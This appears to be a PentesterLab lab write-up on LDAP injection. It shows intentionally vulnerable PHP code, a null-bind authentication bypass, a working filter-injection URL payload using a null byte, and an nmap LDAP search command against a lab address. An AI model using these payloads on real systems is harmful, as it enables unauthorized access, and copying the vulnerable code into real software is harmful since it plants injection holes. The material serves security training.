Pentesterlab--Web for Pentester-LDAP

Web for Pentester: This exercise is a set of the most common web vulnerabilities

Difficluty: 1/5

What is LDAP injection?

from OWASP:

LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it’s possible to modify LDAP statements using a local proxy. This could result in the execution of arbitrary commands such as granting permissions to unauthorized queries, and content modification inside the LDAP tree. The same advanced exploitation techniques available in SQL Injection can be similarly applied in LDAP Injection.

more information: LDAP injection

Example 1

from pentesterlab:

In this first example, you connect to a LDAP server, using your username and password. In this instance, The LDAP server does not authenticate you, since your credentials are invalid. However, some LDAP servers authorise NULL Bind: if null values are sent, the LDAP server will proceed to bind the connection, and the PHP code will think that the credentials are correct. To get the bind with 2 null values, you will need to completely remove this parameter from the query. If you keep something like username=&password= in the URL, these values will not work, since they won't be null; instead, they will be empty.

code review:

example1.php
1
2
3
4
5
  if ($ld) {
   if (isset($_GET["username"])) {
     $user = "uid=".$_GET["username"]."ou=people,dc=pentesterlab,dc=com";
   }
   $lb = @ldap_bind($ld, $user,$_GET["password"]);

The developer uses function ldap_bind to bind parameters. I can bypass the authentication by setting null values to the parameters.

exploit:

http://192.168.79.162/ldap/example1.php

Example 2

code review:

example2.php
1
2
  $pass = "{MD5}".base64_encode(pack("H*",md5($_GET['password'])));
  $filter = "(&(cn=".$_GET['name'].")(userPassword=".$pass."))";

Our goal here will be to inject inside [INPUT1] (the username parameter). We will need to inject:

  1. The end of the current filter using hacker).
  2. An always-true condition ((cn=*) for example)
  3. A ) to keep a valid syntax and close the first )
  4. A NULL BYTE (%00) to get rid of the end of the filter

    exploit:

    http://192.168.79.162/ldap/example2.php?name=hacker)(cn=*))%00&password=rtrtrtr

    nmap search LDAP:

    nmap -p 389 --script ldap-search 192.168.79.162